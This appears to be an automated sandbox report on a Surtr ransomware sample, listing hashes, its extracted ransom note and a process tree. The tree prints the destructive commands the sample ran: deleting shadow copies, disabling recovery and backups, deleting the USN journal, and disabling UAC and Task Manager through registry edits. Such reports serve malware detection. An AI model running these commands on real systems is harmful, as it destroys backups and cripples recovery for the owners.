Analysis

  • max time kernel
    151s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-10-2022 08:20

General

  • Target

    5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe

  • Size

    190KB

  • MD5

    5409ee640663b8d1f520af46c1146c0e

  • SHA1

    73eebd0dd94ce3d161a7f191196b8bcc354af55a

  • SHA256

    5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b

  • SHA512

    dbaf6fdb7ae2dcbbce17aa9c1fc1932a054a024c9f32db8f8c810c9023480476a508397ae9a5e231ba27ce85c6d402b0ce5beb63a4b7fcb20702af9d1ec7f82a

  • SSDEEP

    3072:R1WTpHdp+hKaf5fVZ5/u63YbFVOppyis6h83ZHZZfKmJZGexxVAdueB+out:qHr85x/u6IbFVSyiJOpHTfNA6VxeB+oS

Malware Config

Extracted

Path

C:\ProgramData\Service\SURTR_README.hta

Family

surtr

Ransom Note
SurtrRansomware OOPS ALL YOUR IMPORTANT FILES HAVE BEEN ENCRYPTED AND STOLEN !! Notice : There is only one way to restore your data read the boxes carefully! Attention : Do Not change file names. Do Not try to decrypt using third party softwares , it may cause permanent data loss . your files will be sold on the Dark Web after 15 days. Imagine 1 million hackers have all your information including files, IP, name and number and location and ... Do not pay any money before decrypting the test files. You can use our 50% discount if you pay the fee within first 15 days of encryption . otherwise the price will be doubled. In order to warranty you , our team will decrypt 3 of your desired files for free.but you need to pay the specified price for the rest of the operation . How To Decrypt : Your system is offline . in order to contact us you can email this address [email protected] use this ID (t0pq1466jbkptx) for the title of your email . If you weren't able to contact us within 24 hours please email : [email protected] If you didn't get any respond within 48 hours use this link (Not Available Now).send your ID and your cryptor name (SurtrRansomwareUserName) therefore we can create another way to contact you as soon as possible

Signatures

  • Deletes NTFS Change Journal 2 TTPs 1 IoCs

    The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.

  • Detects Surtr Payload 1 IoCs
  • Surtr

    Ransomware family first seen in late 2021.

  • UAC bypass 3 TTPs 1 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Disables use of System Restore points 1 TTPs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Drops desktop.ini file(s) 2 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 51 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe
    "C:\Users\Admin\AppData\Local\Temp\5c8abbfaf7902307dd307563abd7c06fa90424f82f6327401acca1586f05191b.exe"
    1⤵
    • Checks computer location settings
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of WriteProcessMemory
    PID:1796
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
      2⤵
        PID:4956
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c @echo off
        2⤵
          PID:4936
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c chcp 437
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4288
          • C:\Windows\SysWOW64\chcp.com
            chcp 437
            3⤵
              PID:2204
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"
            2⤵
              PID:1420
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2516
              • C:\Windows\system32\vssadmin.exe
                vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
                3⤵
                • Interacts with shadow copies
                PID:4364
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2044
              • C:\Windows\system32\vssadmin.exe
                vssadmin.exe Delete Shadows /all /quiet
                3⤵
                • Interacts with shadow copies
                PID:5032
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:4444
              • C:\Windows\system32\vssadmin.exe
                vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
                3⤵
                • Interacts with shadow copies
                PID:1512
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:404
              • C:\Windows\system32\vssadmin.exe
                vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
                3⤵
                • Enumerates connected drives
                • Interacts with shadow copies
                PID:2592
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3756
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                3⤵
                • Modifies boot configuration data using bcdedit
                PID:3616
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3176
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} recoveryenabled No
                3⤵
                • Modifies boot configuration data using bcdedit
                PID:4496
              • C:\Windows\System32\Conhost.exe
                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                3⤵
                  PID:5028
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
                2⤵
                  PID:952
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=unbounded
                    3⤵
                    • Interacts with shadow copies
                    PID:3852
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                  2⤵
                    PID:3848
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                      3⤵
                      • Interacts with shadow copies
                      PID:1044
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
                    2⤵
                      PID:208
                      • C:\Windows\system32\fsutil.exe
                        fsutil.exe usn deletejournal /D C:
                        3⤵
                        • Deletes NTFS Change Journal
                        PID:2788
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
                      2⤵
                        PID:3244
                        • C:\Windows\system32\vssadmin.exe
                          vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
                          3⤵
                          • Enumerates connected drives
                          • Interacts with shadow copies
                          PID:1556
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
                        2⤵
                          PID:2160
                          • C:\Windows\system32\wbadmin.exe
                            wbadmin.exe delete catalog -quiet
                            3⤵
                            • Deletes backup catalog
                            PID:2412
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                          2⤵
                            PID:4776
                            • C:\Windows\system32\vssadmin.exe
                              vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                              3⤵
                              • Enumerates connected drives
                              • Interacts with shadow copies
                              PID:2708
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                            2⤵
                              PID:3980
                              • C:\Windows\system32\schtasks.exe
                                schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                3⤵
                                  PID:4940
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                2⤵
                                  PID:3964
                                  • C:\Windows\system32\reg.exe
                                    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                    3⤵
                                    • UAC bypass
                                    PID:4748
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
                                  2⤵
                                    PID:4424
                                    • C:\Windows\system32\reg.exe
                                      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
                                      3⤵
                                        PID:4956
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
                                      2⤵
                                        PID:4724
                                        • C:\Windows\system32\vssadmin.exe
                                          vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
                                          3⤵
                                          • Enumerates connected drives
                                          • Interacts with shadow copies
                                          PID:4060
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded
                                        2⤵
                                          PID:3452
                                          • C:\Windows\system32\vssadmin.exe
                                            vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=unbounded
                                            3⤵
                                            • Enumerates connected drives
                                            • Interacts with shadow copies
                                            PID:3424
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded
                                          2⤵
                                            PID:4392
                                            • C:\Windows\system32\vssadmin.exe
                                              vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=unbounded
                                              3⤵
                                              • Interacts with shadow copies
                                              PID:2188
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                            2⤵
                                              PID:2212
                                              • C:\Windows\system32\reg.exe
                                                reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                3⤵
                                                  PID:5028
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
                                                2⤵
                                                  PID:1508
                                                  • C:\Windows\system32\vssadmin.exe
                                                    vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
                                                    3⤵
                                                    • Enumerates connected drives
                                                    • Interacts with shadow copies
                                                    PID:4164
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded
                                                  2⤵
                                                    PID:3584
                                                    • C:\Windows\system32\vssadmin.exe
                                                      vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=unbounded
                                                      3⤵
                                                      • Interacts with shadow copies
                                                      PID:1112
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
                                                    2⤵
                                                      PID:1904
                                                      • C:\Windows\system32\reg.exe
                                                        reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
                                                        3⤵
                                                          PID:3128
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
                                                        2⤵
                                                          PID:1644
                                                          • C:\Windows\system32\vssadmin.exe
                                                            vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
                                                            3⤵
                                                            • Enumerates connected drives
                                                            • Interacts with shadow copies
                                                            PID:1900
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
                                                          2⤵
                                                            PID:4528
                                                            • C:\Windows\system32\reg.exe
                                                              reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
                                                              3⤵
                                                                PID:4400
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
                                                              2⤵
                                                                PID:1460
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
                                                                  3⤵
                                                                    PID:3756
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
                                                                  2⤵
                                                                    PID:5008
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
                                                                      3⤵
                                                                        PID:3716
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
                                                                      2⤵
                                                                        PID:4192
                                                                        • C:\Windows\system32\vssadmin.exe
                                                                          vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
                                                                          3⤵
                                                                          • Interacts with shadow copies
                                                                          PID:3772
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded
                                                                        2⤵
                                                                          PID:2900
                                                                          • C:\Windows\system32\vssadmin.exe
                                                                            vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=unbounded
                                                                            3⤵
                                                                            • Interacts with shadow copies
                                                                            PID:4212
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=unbounded
                                                                          2⤵
                                                                            PID:1096
                                                                            • C:\Windows\system32\vssadmin.exe
                                                                              vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=unbounded
                                                                              3⤵
                                                                              • Interacts with shadow copies
                                                                              PID:116
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                                                            2⤵
                                                                              PID:1440
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                                                                3⤵
                                                                                  PID:5636
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
                                                                                2⤵
                                                                                  PID:1620
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
                                                                                    3⤵
                                                                                      PID:5848
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
                                                                                    2⤵
                                                                                      PID:4592
                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                        vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
                                                                                        3⤵
                                                                                        • Enumerates connected drives
                                                                                        • Interacts with shadow copies
                                                                                        PID:4672
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=unbounded
                                                                                      2⤵
                                                                                        PID:2216
                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                          vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=unbounded
                                                                                          3⤵
                                                                                          • Enumerates connected drives
                                                                                          • Interacts with shadow copies
                                                                                          PID:1904
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
                                                                                        2⤵
                                                                                          PID:4264
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
                                                                                            3⤵
                                                                                              PID:1332
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
                                                                                            2⤵
                                                                                              PID:1432
                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
                                                                                                3⤵
                                                                                                • Enumerates connected drives
                                                                                                • Interacts with shadow copies
                                                                                                PID:260
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
                                                                                              2⤵
                                                                                                PID:3768
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
                                                                                                  3⤵
                                                                                                    PID:1132
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=unbounded
                                                                                                  2⤵
                                                                                                    PID:2184
                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                      vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=unbounded
                                                                                                      3⤵
                                                                                                      • Interacts with shadow copies
                                                                                                      PID:2212
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
                                                                                                    2⤵
                                                                                                      PID:1240
                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                        vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
                                                                                                        3⤵
                                                                                                        • Enumerates connected drives
                                                                                                        • Interacts with shadow copies
                                                                                                        PID:896
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
                                                                                                      2⤵
                                                                                                        PID:5036
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
                                                                                                          3⤵
                                                                                                            PID:3188
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
                                                                                                          2⤵
                                                                                                            PID:112
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
                                                                                                              3⤵
                                                                                                                PID:5916
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
                                                                                                              2⤵
                                                                                                                PID:4864
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
                                                                                                                  3⤵
                                                                                                                    PID:4860
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
                                                                                                                  2⤵
                                                                                                                    PID:3248
                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
                                                                                                                      3⤵
                                                                                                                        PID:4588
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
                                                                                                                      2⤵
                                                                                                                        PID:3560
                                                                                                                        • C:\Windows\system32\vssadmin.exe
                                                                                                                          vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
                                                                                                                          3⤵
                                                                                                                          • Enumerates connected drives
                                                                                                                          • Interacts with shadow copies
                                                                                                                          PID:5136
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
                                                                                                                        2⤵
                                                                                                                          PID:2904
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
                                                                                                                            3⤵
                                                                                                                              PID:2104
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=unbounded
                                                                                                                            2⤵
                                                                                                                              PID:1512
                                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                                vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=unbounded
                                                                                                                                3⤵
                                                                                                                                • Enumerates connected drives
                                                                                                                                • Interacts with shadow copies
                                                                                                                                PID:3604
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
                                                                                                                              2⤵
                                                                                                                                PID:3092
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
                                                                                                                                  3⤵
                                                                                                                                    PID:3568
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
                                                                                                                                  2⤵
                                                                                                                                    PID:656
                                                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                                                      vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
                                                                                                                                      3⤵
                                                                                                                                      • Enumerates connected drives
                                                                                                                                      • Interacts with shadow copies
                                                                                                                                      PID:116
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
                                                                                                                                    2⤵
                                                                                                                                      PID:2996
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
                                                                                                                                        3⤵
                                                                                                                                          PID:1616
                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
                                                                                                                                        2⤵
                                                                                                                                          PID:1516
                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            3⤵
                                                                                                                                              PID:2188
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
                                                                                                                                              3⤵
                                                                                                                                                PID:3668
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
                                                                                                                                              2⤵
                                                                                                                                                PID:3824
                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                  vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
                                                                                                                                                  3⤵
                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                  PID:3572
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=unbounded
                                                                                                                                                2⤵
                                                                                                                                                  PID:1732
                                                                                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                                                                                    vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=unbounded
                                                                                                                                                    3⤵
                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                    PID:3632
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
                                                                                                                                                  2⤵
                                                                                                                                                    PID:864
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
                                                                                                                                                      3⤵
                                                                                                                                                        PID:5840
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
                                                                                                                                                      2⤵
